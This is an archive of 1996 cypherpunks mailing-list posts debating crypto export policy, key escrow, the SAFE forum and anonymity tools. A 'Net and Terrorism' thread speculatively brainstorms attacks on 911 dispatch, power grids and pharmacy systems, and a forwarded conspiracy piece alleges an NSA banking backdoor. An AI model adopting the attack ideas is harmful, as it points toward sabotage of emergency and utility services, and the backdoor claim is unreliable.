> "Crime prevention ought to be part of the FBI's mission. [Herbert Lin,
> National Research Council]

In case it's not clear, this was said with much sarcasm... i.e., today's FBI
is too often engaged in other pursuits. This in the context of explaining
that ubiquitous strong crypto is the best defense against computer crime.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 3 Jul 1996 07:33:11 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: But what about the poor?
Message-ID: <199607021813.LAA26475@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:37 AM 7/2/96 -0400, Duncan Frissell wrote:
>"Gee Ossifer I'd love to let you read my files but I just couldn't afford
>expensive socialistic key escrow so I bought cheap efficient private key
>escrow instead."

"Gee Orificer, I'd love to let you read my files, but I just couldn't
afford any key escrow, so I went naked and didn't use it."  :-)


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 3 Jul 1996 04:33:43 +0800
To: cypherpunks@toad.com
Subject: PROMISe them anything (was Re: whitehouse dossier database?)
Message-ID: <199607021547.LAA04235@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  1 Jul 96 at 23:39, Vladimir Z. Nuri wrote:

> holy cow, is this real? Grabbe cites several credible references.

Ask Phil Resuto.

[..]
> ------- Forwarded Message
[..]
>               Conspiracy Nation -- Vol. 8  Num. 30
>              ======================================
>                     ("Quid coniuratio est?")
[..]
> THE WHITE HOUSE "BIG BROTHER" DATA BASE
> =======================================
[..]
> 	   The White House "Big Brother" Data 
> 	   Base & How Jackson Stephens 
> 	   Precipitated a Banking Crisis

Jackson Stephens?  Why am I thinking of Steve Jackson Games, operators
of the Illuminati BBS that were raided by the SS a few years back...

[..]
> 	What Deutch failed to mention was that this 
> "banking crisis" in large part was itself created by one of 
> the U.S. intelligence agencies--the NSA in cahoots with 
> Stephens' software firm Systematics.  The Citibank heist 
> by Russian hackers, for example, took advantage of a back 
> door in Citibank's Systematics software.  (The Russian 
> hackers were apparently aided by the son of one of Jim 
> Leach's House Banking Committee investigators.)  Have 
> any major banks thought of instituting lawsuits over this 
> deliberate breach of security on the part of a software 
> supplier?  

Huh? I thought the Russian 'hackers' helped write the software, and 
used one of their own backdoors.
[..]

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 3 Jul 1996 09:06:46 +0800
To: cypherpunks@toad.com
Subject: Re: SAFE Forum--some comments
Message-ID: <199607021936.MAA07885@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:40 PM 7/2/96 -0700, Timothy C. May wrote:
>... Phil Zimmermann, who told a humorous story of  going
>to Congressman Dana Rohrabacher's office, seeing the picture of Ollie North
>on the wall (much laughter), but finding Rohrabacher's staffers aghast at
>the crypto laws and ITARs.

Someone pointed out that Phil and Ollie have something in common.  They
have both been accused of illegally exporting crypto.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Davis <ericd@shop.internet.net>
Date: Wed, 3 Jul 1996 09:14:06 +0800
To: cypherpunks@toad.com
Subject: SAFE Archive
Message-ID: <Pine.SOL.3.91.960702125354.1425C-100000@shop>
MIME-Version: 1.0
Content-Type: text/plain



FYI: The complete SAFE Forum audio archive is online at:
	http://www.mediacast.com

-----------------------------------------------------
Eric Davis 			   ericd@internet.net
Director of Information Systems	     415-842-7400 (V)
Internet Shopping Network	     415-842-7415 (F)
Visit our site at:	          http://www.isn.com/
Co-Founder MediaCast	    http://www.mediacast.com/
Personal contact:     ericd@cyberfarm.com  KD6HTO (R)
-----------------------------------------------------
There are no law enforcers if law itself they ignore.
 -- Inka Inka -- Step Back -- Myth of the Machine --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Davis <ericd@shop.internet.net>
Date: Wed, 3 Jul 1996 10:12:22 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
In-Reply-To: <199607021730.KAA18852@mail.pacifier.com>
Message-ID: <Pine.SOL.3.91.960702125650.1425D-100000@shop>
MIME-Version: 1.0
Content-Type: text/plain



Hughes offers a downlink product called DirectPC.
The back channel is your regular modem.
Telco/Analog your requests to their servers 
and the data is delivered via your DSS dish,
sent to your PC and decoded via an ISA card. 
(Opt. DES downlink encryption)
http://www.direcpc.com/

The downlink is shared 500Kb/s ( I think ).
Though you can schedule a higher BW channel
for A/V applications (or so the lit reads).

Think it supports multicast/broadcast by default...

Eric Davis
-----------------------------------------------------
Eric Davis 			   ericd@internet.net
Director of Information Systems	     415-842-7400 (V)
Internet Shopping Network	     415-842-7415 (F)
Visit our site at:	           http://www.isn.com
Personal contact:     ericd@cyberfarm.com  KD6HTO (R)
-----------------------------------------------------
There are no law enforcers if law itself they ignore.
 -- Inka Inka -- Step Back -- Myth of the Machine --

On Tue, 2 Jul 1996, jim bell wrote:

> At 08:28 PM 7/1/96 -0700, David Wagner wrote:
> 
> >If folks have better ideas for how to achieve really good recipient
> >anonymity, I hope they'll speak up!
> 
> Once they start offering Internet news/email/USENET feeds (one way) by 
> DSS-type dish antenna from satellite, it'll be mighty hard to figure out 
> who's receiving the data. They could probably easily provide 10 megabits per 
> second, which I assume would be more than enough for what's needed.
> 
> (BTW, for a few years a company called "Planet Connect" has been providing 
> FIDOnet data feeds, although they use the older-style, large antenna 
> systems, and their data rate is 19.2kbps, not even close to enough for 
> Internet service.)
> 
> Jim Bell
> jimbell@pacifier.com
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 3 Jul 1996 09:20:35 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: SAFE Forum--some comments
In-Reply-To: <adfea59d02021004104f@[205.199.118.202]>
Message-ID: <199607022014.NAA10761@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM

>And here I'll comment on Ken Bass's excellent comments [...]
>
>He pointed out that the driving force for crypto policy is probably the
>_law enforcement_ camp, not the _intelligence agency_ camp. And that the
>NSA is regretting the ITAR stuff, as it has sparked an "arms race" to
>develop stronger crypto. Bass noted that people now equate permission to
>export with weakness, and that had the U.S. not restricted exports, users
>probably would've been "fat, dumb, and happy" to keep using breakable
>crypto.

doesn't make sense to me at all. who was behind clipper? the NSA, not
the FBI.  the FBI is behind digital telephony, which involved
*wiretapping*, not key escrow.

actually I think that the NSA is trying to convince law enforcement
agencies that if they follow the NSA plan of crypto suppression &
key escrow that their job will be easier, that great instability results from
unfettered crypto. this fits into the way the NSA hates to be behind
any proposal themself, and need "cut outs" to do the lobbying for them.

I think at the core of it the NSA doesn't really care too much about
law enforcement issues like obtaining warrants and that kind of thing.
all the talk about warrant and subpoenas makes no sense from the point
of view of the NSA.  the NSA goals and the law enforcement goals
do not really seem to me to overlap much at all and that the whole
argument that they do has been a diversion.

this suggests an interesting way to turn the "pro-suppression" crowd
against itself. if the law enforcement arm can be convinced, as
many people are now advocating, that strong crypto actually makes
their job easier and the world information infrastructure less insecure,
they may eventually advocate unfettered crypto. then you have only
the NSA alone standing up and saying that they need the suppression
laws.

the concept that the NSA "regrets" ITAR laws sounds like an utter
fantasy to me. the ITAR has been around for decades. the NSA has
been continually *strengthening* the interpretations of the ITAR.
the ITAR is enforced largely through NSA *harassment* of companies
that are seen to be supposedly violating it. the NSA can stop sending
their "men in black" at any time. when the harassment stops, the
crypto would spread. no one is twisting the NSA's arm to reject
crypto exports in all the applications that are submitted. rather,
it is the NSA that is doing all the arm twisting.

the NSA has made radical interpretations of the ITAR in various 
situations:

1. they rule that mere *hooks* are illegal
2. they have told Microsoft that merely *signing* foreign crypto software
packages is illegal

so the more I think about it, the more I think Bass's comments
as reported by TCM are a pile of hooey. perhaps even disinformation.
the NSA has full power to stop their harassment campaign at any
time. it is possible that there are *elements* within the NSA that
regret the policy, but they clearly are not the ones involved in 
enforcing it.

what many people fail to mention is that today we may not even
have these horrible infoterrorist problems that the NSA and CIA
et. al. are screeching about lately if crypto had been allowed to
grow organically and unharassed.  in my view, the NSA is largely
*responsible* for the weakness in the information infrastructure
as it now stands because of their suppression of efforts to
implement strong security via crypto. this is the great hypocrisy
of it all.

frankly at times I think the whole key escrow
debate seems like a huge smokescreen or decoy just to get the public
to argue about something the NSA was never seriously contemplating
anyway. it's could be just a delaying tactic that is working quite 
spectacularly.  every conference of experts sounds the same and they all 
come to the same conclusion. meanwhile the ITAR is virtually unchanged within
the last 5 years.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 3 Jul 1996 01:06:24 +0800
To: cypherpunks@toad.com
Subject: LOS_tit
Message-ID: <199607021322.NAA17823@pipe4.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-2-96 UST, page one: 
 
   "Companies fear losing privacy, customers' trust." 
 
      In a show of self-reliance reminiscent of the old West, 
      companies are taking matters into their own hands, 
      hiring security firms to protect their computer systems 
      and ignoring the convention that law enforcement is the 
      best defense. It's a stance that has implications for 
      law enforcement and commerce, raises broad questions of 
      privacy and control, and pits the philosophy of the 
      Clinton administration directly against that of many 
      Fortune 500 companies. "An organization has very little 
      to gain" by reporting, says Lloyd Hession, of IBM's 
      Business Recovery Services. 
 
      There seems to be universal agreement that the strongest 
      means for securing computer data against theft lies in 
      cryptography, but the Clinton administration, citing 
      fears that criminals would use cryptography to cloak 
      their activities, is setting regulations slowing 
      development of cryptography software. 
 
      The Clinton administration is to announce, as early as 
      this week, a commission to determine the federal 
      government's role in securing cyberspace, from terrorism 
      to petty crimes. 
 
 
   http://pwp.usa.pipeline.com/~jya/lostit.txt   (13 kb) 
 
      Go via www.anonymizer.com. Pipeline now belongs to 
      Mindspring, an Atlanta company. 
 
   LOS_tit 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 3 Jul 1996 09:21:33 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: hard drive encryption
In-Reply-To: <2.2.32.19960702145307.006bb7ac@gonzo.wolfenet.com>
Message-ID: <Pine.GUL.3.94.960702132712.22017G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, Cerridwyn Llewyellyn wrote:

> What is the best utility freely available for encrypting an entire drive
> that won't be used for a length of time?  ie: I'm going away for a period
> of time and wish to encrypt the drive while I'm gone, but have no interest
> in actually using it while it's encrypted.  I also have no real preference
> in what algorithm is used, as long as it's relatively secure.  Speed is 
> also not a big consideration, as it will be used once when I leave to encrypt,
> and once when i return to decrypt.  

Joel's book is not to be missed, but for the single-use application you
describe, a screwdriver and a trip to a safe deposit box (or a friend's
house) might be more appropriate...

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Benjamin R. Ginter" <bginter@abilnet.com>
Date: Wed, 3 Jul 1996 09:37:51 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: hard drive encryption
In-Reply-To: <2.2.32.19960702145307.006bb7ac@gonzo.wolfenet.com>
Message-ID: <31D99039.8BD@abilnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn wrote:
> 
> 
> What is the best utility freely available for encrypting an entire drive
> that won't be used for a length of time?  ie: I'm going away for a period
> of time and wish to encrypt the drive while I'm gone, but have no interest
> in actually using it while it's encrypted.  I also have no real preference
> in what algorithm is used, as long as it's relatively secure.  Speed is
> also not a big consideration, as it will be used once when I leave to encrypt,
> and once when i return to decrypt.
> Thanks in advance for the help...
> //cerridwyn//
> 
> btw, the OS is Win95 if that matters...

Just take your hard drive with you, jeez..

[gk]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Wed, 3 Jul 1996 09:27:33 +0800
To: cypherpunks@toad.com
Subject: Re: SAFE Forum--some comments
Message-ID: <2.2.32.19960702211030.01075964@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:40 PM 7/2/96 -0700, Timothy C. May wrote:
>
>I was at the "SAFE" forum yesterday. Too many things to report on, so I'll
>just add comments here and there.
>

I thought it was interesting to not that a Republican Senator came to
california to talk about this stuff and *neither* of the California
Senators has got a clue yet.

One questioner from the audience made an interesting point that given
that most of american can't seta vcr clock crypto will be totally
beyond them unless it becomes pervasive ("you can buy it at radio shack").

It was pretty clear from all the speaker that this is a
libertarian/authoritarian issue and not a liberal/conservative one.


John

John Pettitt, jpp@software.net
EVP, CyberSource Corporation, 415 473 3065

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Wed, 3 Jul 1996 10:12:41 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: SAFE Forum
Message-ID: <2.2.32.19960702211201.01023864@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 AM 7/2/96 -0700, Rich Graves wrote:
>On Mon, 1 Jul 1996, Bill Frantz wrote:
>
>> "Crime prevention ought to be part of the FBI's mission. [Herbert Lin,
>> National Research Council]
>
>In case it's not clear, this was said with much sarcasm... i.e., today's FBI
>is too often engaged in other pursuits. This in the context of explaining
>that ubiquitous strong crypto is the best defense against computer crime.
>
>-rich
>
>

Crime prevention is *never* part of their mission after all if crime is
prevented it's hard to use the crime stats to justify the budget ...


John Pettitt, jpp@software.net
EVP, CyberSource Corporation, 415 473 3065

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 3 Jul 1996 03:56:27 +0800
To: cypherpunks@toad.com
Subject: TRI_cks
Message-ID: <199607021418.OAA29985@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-2-96. FiTi: 
 
   "A Japanese engineer's box of tricks is helping detect 
   forged banknotes." 
 
      Counterfeit dollar bills are judged on a scale of one to 
      nine, with the crudest at level one. The detector 
      machines that existed before Matsumura's could only pick 
      out bills at around level five or six. Supernotes are 
      ranked between seven and nine and have been almost 
      impossible to detect. Matsumura says supernotes do have 
      flaws, though, and his machine can spot differences in 
      the printing by referring to a histogram, or statistical 
      graph, of patterns on real US notes. Each supernote 
      tends to have two or three minute aberrations. 
      Consequently, sensors check for any variations at 12 
      points on the note. A 0.9-second scan also monitors the 
      thickness of the paper and the printing ink. 
 
      The company can only produce 500 units a month, but 
      already has orders for 45,000. 
 
 
   http://pwp.usa.pipeline.com/~jya/tricks.txt  (4 kb) 
 
   TRI_cks 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 3 Jul 1996 09:52:19 +0800
To: cypherpunks@toad.com
Subject: Rambling about "Net and Terrorism" (long, slightly amusing, and
Message-ID: <199607021839.OAA07556@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  2 Jul 96 at 1:58, snow wrote/quoted:

[It's hard to tell what's a quote and what snow wrote here]

> Can anything be done? To stop the likely effects of lots more
[..]
> In a word, "no."
> /*
>      I disagree. Terrorism, political terrorism is fear. There are ways to
> protect military targets that are quite cost effective, unfortunately they
> are politically unpopular. (What just happend in Saudi is on my mind.
[..]
Yep. Terrorism is fear, but *no* target can be 100% protected. Not 
even military targets, though it can get difficult and expensive for 
someone to attack a target.  In such cases, terrorists would go for 
easier targets.

Terrorism is against a larger, vague target such as a nation or 
corporation or an industry or an ideology.  Instances are against 
representations of the target.... a military base is attacked because 
it is a symbol, not because it is strategic.  If said terrorists 
cannot attack a military base, they'll attack some soldiers on leave 
at a disco.

The symbolic importance cannot be understanted (though it doesn't 
mean that strategic targets are safe either).  So to get back to 'net 
related discussion: differentiate between use of the internet (and 
phone or mail systems) to plan acts and spread propaganda versus 
terrorist acts on the internet.  The former implies a need for LEAs 
to snoop, while the latter implies a need for high-security, crypto, 
etc.... they are not so compatible.

So let's say Wild Al's Church of Kookology and Jihad of Banality 
(WACKJOB) is planning a cyber-terrorist act.  They want something 
symbolic that will demoralize the United Statesers (USers), so that 
they will pressure the US government to stop it's Promotion of 
Internation Googoomuck (PIG) in some corner of the world.

It's counter-productive for WACKJOB to stop PIG by destroying the 
Federal Reserve's computers, paritcular because an economic collapse 
will keep USers from buying widget fluid from one of their sponsor 
countries.  WACKJOB would also be unable use counterfeit (or real) 
yankee greenbacks to support their enterprise... and likely this 
would have a negative effect on marks, pounds, etc.  Note that any 
wealthy kooks who couldn't give a damn about WACKJOB or PIG but like 
to show off their kook-factor among their other wealthy friends by 
bankrolling WACKJOB would also be adversely affected... and chances 
are WACKJOB will not bite the hand that helps it.

WACKJOB might want to disrupt communications so that they can perform 
a non-cyber terrorist act against PIG, but this might prove more 
difficult because the Management's systems of communication 
(telephones, email, cellular, courier, face-to-face meetings, etc.) 
is complex and distributed.  Also, WACKJOB would want the pigsty 
networks functioning so that the USers will know about the WACKJOBs 
sacrificed their lives and disrupted downtown traffic in NYC by 
leaping off buildings and splattering on the pavement.

So other than using the 'net to plan their WACKJOB (so absurd that 
the NSA gronk who intercepted the traffic had to be taken to the 
hospital with a hernia from laughing so much), what *symbolic* 
cyber-terrorist acts could an aspiring WACKJOB plan?

Keep in mind people value human life a little more computer records 
or property (excepting certain 'libertarian' folk).  WACKJOBs would 
attack computer systems that would have an immediate affect on USers 
lives... but not permanent, and ones that would still allow USers to 
know it was a WACKJOB.  It would have to be something that appeared 
to affect mainstream USers.

Perhaps interfering with transportation or medical communications that 
allowed for a mass amount of injury or death in a short, tragic and 
dramatic burst.  Seems securing these systems would be a priority.

(Question: possibility of two systems of crypto, escrowed for general 
public and unescrowed for institutional systems which are more 
controlled, and where LEAs can get some access to because of the 
institutional nature?)

[..]
> Civilian targets are harder to protect, but certain steps can be
> taken to lessen chances of a sucessful attack.

Lesser chances of being hit by a falling WACKJOB are not the same as 
no chance of it.

> Another method, and this would be very unpopular (and
> hypocritical of the US) would be simply to announce that we (the Country)
> are going to hold the _manufacturing_ nation responcible for the use of
> weapons of mass destruction. So if Soviet Nerve Gas is used, we gas a
> city in the Soviet Union. MAD carried to a lower level. 

Feh! Maybe the Russians hate the WACKJOBs as much as the USers, but a 
corrupt or poor gronk in

   O-+>|  ("The country formaerly known as Russia")

sold nerve gas to a WACKJOB... or some WACKJOB stole it.  Why hold 
them responsible?!?  And what if it was stolen from a USer?  Under 
that logic, we can go after the company that mined the steel used in 
the knife that killed Nicole Simpson (probably a few WACKJOBs would 
agree with that...)

> A third option is quite simply to buy as much of it as possible. 

So WACKJOBs make their own nerve gas from common household 
ingredients like Olestra and NutriSweet.  Then what?

>> I expect a city or two to get nuked in the next decade or so. (Haifa or Tel
>> Aviv would be my leading candidates.) To me, this is unsurprising.

> My bets in the following order:
[..]

So the WACKJOBs decide that the center of PIGginess conspiracy 
happens to be in some rural BFE, hiding under the guise of the 
Fritters County Malitia and Bible Emporium or maybe in the local Federal 
Bureau of Ice Cream and Prophylactics Building and nuke the small town you 
just happen to live in.  (Who would have suspected Oklahamo City?)

Many terrorist strieks against Brittain or Israel/Palestine did not occur 
in major cities.  Many did not occur in those countries, but on 
airlines or cruise ships, or in other countries where the targets 
are.

If you are a USer, you are a target for a WACKJOB.  Doesn't matter if 
you're in NYC or London or the middle of nowhere or taking an 
airplane from a WACKJOB-sympathizing country.  Doesn't even matter if 
you're a WACKJOB sympathizer.

>      I don't think that terrorists in the middle east will pop a nuke as
> they would get as many of their own as the "enemy". One of the things a
> terrorist needs more than money is a place to hide, and if you are
> killing your own people, they won't shield you. 
[..]

Why only mideast groups?  Why should *they* be the only terrorists? 
With the 'net, any group with a bone to pick can, in theory, go after 
bigger cyber-targets (in theory, anyway).

And why nuking? One can understand up-and-coming-regional powers such 
as Iran or Iraq, Pakistan, trying to get stolen nukes, but not likely for 
terrorism.

Not saying that no terrorist group would use nukes... but even a lot 
of stupid WACKJOBs know that nuking a major (or minor) US city would 
provoke a fierce response from the US, and probably a lot of other 
countries that felt equally under threat or wanted to disociate 
themselves from WACKJOBs.  If a WACKJOB's friends or family felt 
nuking was too extreme, a WACKJOB becomes a pariah.  Perhaps even the 
official WACKJOBs disociate themselves from the WACKJOBs who nuked 
some city...

Terrorists want to demoralize their enemies, not anger them further.

[..]
> One objective of terrorism is/could be to lessen a populations faith
> in "The System". Some possible situations [...]
> 
> Trash a multi-store pharmacy database and people can't get their
> prescriptions, or worse get the wrong one. 

Wrong ones? No. It can be recovered from, though with much 
inconveniencem for most people.  Trashing a computerized pill-making 
system so the wrong medications were in the wrong pills would have 
more effect... but would it demoralize faith in the system?

> Cause disturbances in certain parts of certain cities, then attack
> the 911 system to route officers and firemen to _wealthy_ neigborhoods at
> the expense of the poor neighborhoods. Then complain to the papers about
> it. 

The 911 system doesn't work.  Officers and firement only go the the 
wealthy neighborhoods in many cities and plenty of people already 
complain about it.  WACKJOBs want a terrorist act that would be 
noticed... contributing to the status quo isn't an act of terrorism.

> Gain control of the power grid (I don't know how possible this is)
> and selectively brown out certain sections of the city during peak demand
> periods. Make it obvious, then do the preceeding idea.  

Many places have backup generators or their own local systems. If you 
live in a hurricane or earthquake prone area your used to losing your 
electrcity.  Possibly one could get a utility's computer system to 
dosconnect thousands of subscribers for not paying bills, which would 
incite anger against it (though chances are their computer system 
would do this without any human intervention).

Differentiate between extortion ("give a million dollars to x account 
or all subscribers are disconnected"), vandalism/prank/K001 d00Z 
feat, system malfunction/bad programming, and WACKJOBs.
They cannot be lumped together as generic 'terrorism'.

It seems the pro-GAK and police-state forces focus on WACKJOBs when 
they use the term 'terrorists' (though they may label others as such 
for effect at times).

> In all of these people will, or could die, but are much more
> effective in undermining the faith people have in the structures that run
> the country. If a bomb blast goes off, people get pissed off at the bomb
> makers, if the power fails, people get pissed at the electrical company.
> If you can create a large enough disturbances they will be better than
> bombs.

What is one trying to accomplish by creating a disturbance?  To lead 
to a collapse of the nation state? Chances are widespread disturbance 
will lead to large-scale martial law, which would favor statists.

The focus has been on larger, 'sexier' and 'heroic' acts of terrorism
which are inappropriate to the 'net.  What if the WACKJOBs manage to
infect copies of Windoze 6.0 with a copy of a virus that destroys
PIG-related files?  Or if they vanadalize web pages, ftp- or gopher
sites with (what they perceive as) PIG-related materials?  Or a
WACKJOB cancel-moose roaming Usenet?  It also seems as if GAK-
proposals would be a hinderance to measure to protect against such
acts.

Another reason the 'net is a "terrorist threat"... it allows 
"terrorist" groups to have a voice.  Didn't a recent government paper
cite Zapatista communiques as an example of this?  Anti-terrorist 
measures are as much (if not mroe) thought 'protection' as they are
property/life protection.

"Terrorism" (as defined by the state) does more to stregthen the state,
by creating a nebulous enemy that the state can put an ugly face on while
seizing control to 'protect' itself.  'Cyberterrorism' is something the state
uses to claim jurisdiction over the cybernetic ether, or by which certain
consultants spread FUD for their own benefit.

Situationist's comments about the "Protection Racket" come to mind 
here.


Rob.


---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 3 Jul 1996 10:33:22 +0800
To: cypherpunks@toad.com
Subject: Re: PROMISe them anything (was Re: whitehouse dossier database?)
In-Reply-To: <199607021547.LAA04235@unix.asb.com>
Message-ID: <Pine.GUL.3.94.960702144218.22017H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, Deranged Mutant wrote:

> On  1 Jul 96 at 23:39, Vladimir Z. Nuri wrote:
> 
> > holy cow, is this real? Grabbe cites several credible references.
> 
> Ask Phil Resuto.

No, for the full story, look at:

 http://www.cco.net/~trufax/reports/bavarian.html

> >               Conspiracy Nation -- Vol. 8  Num. 30

I always thought this was a self-parody, like "50 Greatest Conspiracies of
All Time." Looking through back issues again, I concede that he might be
doing it on purpose. Which is an entirely different thing than saying he
believes it.

> > Stephens' software firm Systematics.  The Citibank heist 
> > by Russian hackers, for example, took advantage of a back 
> > door in Citibank's Systematics software.  (The Russian 
> > hackers were apparently aided by the son of one of Jim 
> > Leach's House Banking Committee investigators.)  Have 
> > any major banks thought of instituting lawsuits over this 
> > deliberate breach of security on the part of a software 
> > supplier?  
> 
> Huh? I thought the Russian 'hackers' helped write the software, and 
> used one of their own backdoors.

Shh. Never let the truth get in the way of a good rant.

-rich
 http://www.c2.org/~rich/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <elam@art.net>
Date: Wed, 3 Jul 1996 10:25:18 +0800
To: tcmay@got.net
Subject: Re: SAFE Forum--some comments
Message-ID: <199607022147.OAA10677@art.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, I went to SAFE and found that it was very helpful for me.
I have been struggling with trying to figure out what I personally
can do to help change the current state of cryptography in the 
US of A and found that alot of good suggestions were made at this
conference. 

It was almost like a brainstorming event on how to get things
(US politics and laws) going in the right direction in this field. 

Hearing leaders in the cryptography field speak was awesome. 
They were direct and to the point. And you could tell that they
were being completely strait with everyone about the current situation
and what the technology could/could-not do for us. 

The comment I kept hearing over and over was that we have to 
educate the public about what cryptography is and why it's important
to everyone using computers to communicate. This public includes
people who are not on the net and those who don't even know what the 
Internet is. 

So, now I have some ideas on what I, as an individual can do to
help.  Educating poeple about crypto. I work with alot of artists
on the net (~300+) and will introduce crytography to them. We'll
think of some cool ways to implement it in our work and in the
process will learn how to use it. :)

The SAFE t-shirts were great too...

-lile
(a webmaster@art.net)
     www.art.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 3 Jul 1996 10:31:45 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
In-Reply-To: <Pine.LNX.3.93.960702005840.99C-100000@smoke.suba.com>
Message-ID: <Pine.LNX.3.93.960702161117.90A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, snow wrote:
> Cause disturbances in certain parts of certain cities, then attack
> the 911 system to route officers and firemen to _wealthy_ neigborhoods at
> the expense of the poor neighborhoods. Then complain to the papers about
> it. 
> 
> Gain control of the power grid (I don't know how possible this is)
> and selectively brown out certain sections of the city during peak demand
> periods. Make it obvious, then do the preceeding idea.  
> 
> In all of these people will, or could die, but are much more
> effective in undermining the faith people have in the structures that run
> the country. If a bomb blast goes off, people get pissed off at the bomb
> makers, if the power fails, people get pissed at the electrical company.
> If you can create a large enough disturbances they will be better than
> bombs.
> */ 

	Ummm... Just in case anyone is thinking it right now, NO, I
didn't. If this outage was deliberate, I had nothing to do with it. I was
just postulating possibilities. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 3 Jul 1996 09:33:22 +0800
To: cypherpunks@toad.com
Subject: Re: PGP secret keys
Message-ID: <199607022040.QAA09851@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  2 Jul 96 at 6:39, anonymous-remailer@shell.port wrote:

> Could someone post a pointer to a FAQ that tells what to do if you loose
> your secret key file?  How can you regenerate your private key so that the
> userid number still matches the public key that has been distributed??

You can't do anything. Yer screwed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 3 Jul 1996 09:43:27 +0800
To: daw@cs.berkeley.edu (David Wagner)
Subject: Re: Message pools _are_ in use today!
Message-ID: <199607022051.QAA10112@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  1 Jul 96 at 20:28, David Wagner wrote:
[..]
> Ian and I talked about this at some length.  alt.anonymous.messages
> has certain unfortunate shortcomings.

> Someone sniffing the Berkeley 'net can tell when I receive an
> alt.anonymous.messages message by when I download an article from
> the NNTP server; they can tell when I send such an article by when
> I upload an article to the NNTP server; they can list all the
> ``subversive'' Berkeley folks who have read alt.anonymous.messages
> lately.

Uploading can be gotten around by using anonymous remailers and 
mail-to-news gateways... although someone can tell if you send mail 
to anonymous mailers.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Wed, 3 Jul 1996 13:37:47 +0800
